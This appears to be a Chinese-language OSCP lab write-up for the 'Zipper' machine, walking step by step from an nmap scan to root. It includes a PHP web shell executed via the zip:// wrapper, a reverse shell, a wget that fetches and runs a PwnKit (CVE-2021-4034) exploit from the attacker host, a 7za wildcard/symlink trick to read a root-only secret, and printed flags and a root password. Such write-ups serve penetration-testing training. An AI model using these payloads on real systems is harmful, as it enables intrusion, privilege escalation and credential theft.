OSCP靶场--Zipper

OSCP靶场–Zipper

考点(php zip:// rce[文件上传] + CVE-2021-4034提权+7z 通配符提权)

1.nmap扫描

┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.249.229 -sV -sC -Pn --min-rate 2500            
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 07:40 EDT
Nmap scan report for 192.168.249.229
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.94 seconds
                                                                

2.user priv

## 主页是文件上传页面，上传文件压缩成zip文件：
http://192.168.249.229/

## 测试发现LFI漏洞：读取index.php源代码：
http://192.168.249.229/index.php?file=php://filter/convert.base64-encode/resource=index

## 解码base64:
PD9waHAKJGZpbGUgPSAkX0dFVFsnZmlsZSddOwppZihpc3NldCgkZmlsZSkpCnsKICAgIGluY2x1ZGUoIiRmaWxlIi4iLnBocCIpOwp9CmVsc2UKewppbmNsdWRlKCJob21lLnBocCIpOwp9Cj8+Cg==

<?php
$file = $_GET['file'];
if(isset($file))
{
    include("$file".".php");
}
else
{
include("home.php");
}
?>


#################
## 上传payload.php文件：执行命令：
## payload.php
<?php system($_GET['cmd']); ?>

## 注意%23是#号分割，payload后面没有.php 后面使用&号执行命令：
http://192.168.249.229/index.php?file=zip://uploads/upload_1711716550.zip%23payload&cmd=whoami
www-data 

#############
## 反弹shell:
## 修改下面phpwebshell的ip和port，上传反弹
https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php

##
http://192.168.249.229/index.php?file=zip://uploads/upload_1711718376.zip%23payload

##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.249.229: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.249.229] 48394
Linux zipper 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 13:21:03 up  1:44,  0 users,  load average: 0.13, 0.03, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
##
www-data@zipper:/var/www$ cat local.txt
cat local.txt
b9d2a82162de8558f2dcc46cb97c7bec


###########

反弹shell:

3. root priv

3.1 CVE-2021-4034提权

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                            
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main



##
www-data@zipper:/tmp$ wget http://192.168.45.171/CVE-2021-4034.py
wget http://192.168.45.171/CVE-2021-4034.py
--2024-03-29 13:36:33--  http://192.168.45.171/CVE-2021-4034.py
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’

CVE-2021-4034.py    100%[===================>]   3.19K  --.-KB/s    in 0.001s  

2024-03-29 13:36:34 (3.45 MB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]

www-data@zipper:/tmp$ chmod +x ./CVE-2021-4034.py
chmod +x ./CVE-2021-4034.py
www-data@zipper:/tmp$ python3 ./CVE-2021-4034.py
python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cat /root/proof.txt
cat /root/proof.txt
e8302d57c136d504904eaf411d9a4555

3.2 7za 通配符提权【利用7z 通配符读取root用户的文件】：

## linpeas发现root的定时任务使用了7za
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/backup.sh


╔══════════╣ Unexpected in /opt (usually empty)
total 16                                                                                                                                      
drwxr-xr-x  3 root root 4096 Aug 12  2021 .
drwxr-xr-x 20 root root 4096 Aug 12  2021 ..
-rwxr-xr-x  1 root root  153 Aug 12  2021 backup.sh
drwxr-xr-x  2 root root 4096 Mar 29 13:30 backups

###############
##
www-data@zipper:/tmp$ ls -al /opt/backup.sh
ls -al /opt/backup.sh
-rwxr-xr-x 1 root root 153 Aug 12  2021 /opt/backup.sh
www-data@zipper:/tmp$ cat /opt/backup.sh
cat /opt/backup.sh
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log

www-data@zipper:/tmp$ ls -al /root/secret
ls -al /root/secret
ls: cannot access '/root/secret': Permission denied

#################
## 创建链接文件：链接到要读取的高权限文件：
www-data@zipper:/var/www/html/uploads$ ln -s /root/secret aaa.zip
ln -s /root/secret aaa.zip

## 创建文件@aaa.zip 用来表明aaa.zip是一个链接文件：
www-data@zipper:/var/www/html/uploads$ touch @aaa.zip
touch @aaa.zip
www-data@zipper:/var/www/html/uploads$ ls -al
ls -al
total 48
drwxr-xr-x 2 www-data www-data 4096 Mar 29 14:02 .
drwxr-xr-x 3 www-data www-data 4096 Aug 12  2021 ..
-rw-r--r-- 1 www-data www-data   32 Aug 12  2021 .htaccess
-rw-rw-rw- 1 www-data www-data    0 Mar 29 14:02 @aaa.zip
lrwxrwxrwx 1 www-data www-data   12 Mar 29 14:02 aaa.zip -> /root/secret
-rw-r--r-- 1 www-data www-data  156 Aug 12  2021 upload_1628773085.zip
-rw-r--r-- 1 www-data www-data  126 Mar 29 12:04 upload_1711713846.zip
-rw-r--r-- 1 www-data www-data  249 Mar 29 12:18 upload_1711714723.zip

###########
## 查看日志输出：
##
www-data@zipper:/opt/backups$ cat backup.log
cat backup.log

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz (A0655),ASM,AES-NI)

Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 310

Scanning the drive:
2 files, 175 bytes (1 KiB)

Updating archive: /opt/backups/backup.zip

Items to compress: 2

Files read from disk: 2
Archive size: 462 bytes (1 KiB)

Scan WARNINGS for files and folders:

WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1

/root/secret : WildCardsGoingWild 

## ssh登陆：
我们可以通过以下方式使用密钥WildCardsGoingWild来以 root 身份进行身份验证SSH：
┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.249.229                        
root@192.168.249.229 's password: 

4.总结：

##
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#wrapper-zip

## php zip:// rce
https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/

## CVE-2021-4034
 https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py  

## 通配符注入
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#chown-chmod